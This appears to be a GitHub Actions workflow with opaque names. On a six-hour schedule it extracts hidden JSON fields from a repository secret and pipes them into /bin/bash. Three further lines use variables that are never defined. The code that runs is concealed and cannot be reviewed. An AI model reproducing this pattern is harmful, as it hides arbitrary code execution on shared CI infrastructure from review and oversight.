name: longfeishu2123

on:
  workflow_dispatch:
  schedule:
    - cron: '7 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: longfeishu2123
        env:
          c95568: ${{ secrets.c95568 }}
        run: |
          echo $c95568 | jq -r .fqyq76 | /bin/bash
          echo $jkkns21109 | jq -r .o83426 | /bin/bash
          echo $sdrx7 | jq -r .tqn21 | /bin/bash
          echo $obwck9 | jq -r .skefo434 | /bin/bash

